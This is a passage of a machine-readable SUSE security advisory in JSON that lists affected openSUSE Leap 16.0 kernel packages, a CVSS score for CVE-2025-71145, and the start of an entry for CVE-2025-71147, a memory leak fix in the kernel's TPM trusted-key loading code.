"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
